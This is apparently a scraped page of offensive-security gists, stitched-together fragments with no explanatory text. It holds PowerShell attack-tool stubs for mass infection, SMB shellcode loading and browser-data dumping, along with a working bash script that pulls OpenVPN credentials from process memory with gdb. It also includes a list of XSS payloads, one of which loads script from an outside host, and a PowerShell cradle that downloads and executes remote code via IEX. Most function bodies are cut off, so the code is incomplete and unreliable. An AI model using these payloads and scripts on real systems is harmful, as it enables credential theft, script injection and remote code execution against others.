This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-MassInfect
{
<#
Inspired by Chris Campbell's WMIS command encoder
https://github.com/obscuresec/random/blob/master/EncodeShell.py
CIDR Parser from Matt Graeber's Invoke-PortScan
https://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1
function Invoke-SMBWmi {
    [CmdletBinding()]
    param(
        [String[]]
        $ComputerName = ".",
        [String]
        $Pipename = "tf12lol"
#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}')
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"
strings *.dump | awk 'NR>=3 && NR<=4 { print }'
rm *.dump --force
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
powershell.exe -nop -c "`$wc = New-Object System.Net.Webclient; `$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) Like Gecko'); `$wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; `$wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX (`$wc.downloadstring('$URL'))" |
function Get-RecentDocs {
<#
.SYNOPSIS
    Pulls names of recently opened documents from registry
    Author: Matthew Graeber (@mattifestation)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
.DESCRIPTION
function Get-BrowserInformation {
<#
.SYNOPSIS
    Dumps Browser Information
    Author: @424f424f
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
.DESCRIPTION
    Enumerates browser history or bookmarks
import binascii
import sys

file_name = sys.argv[1]
# Read the input as raw bytes; text mode can alter or fail on binary data
with open(file_name, 'rb') as f:
    hexdata = binascii.hexlify(f.read()).decode()
# Split the hex string into two-character byte values
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
shellcode = ''
for i in hexlist:
    shellcode += "0x{},".format(i)
function Invoke-SMBShellcodeLoad {
<#
.SYNOPSIS
    Short description
.DESCRIPTION
    Long description
.EXAMPLE
    An example
#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
#
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket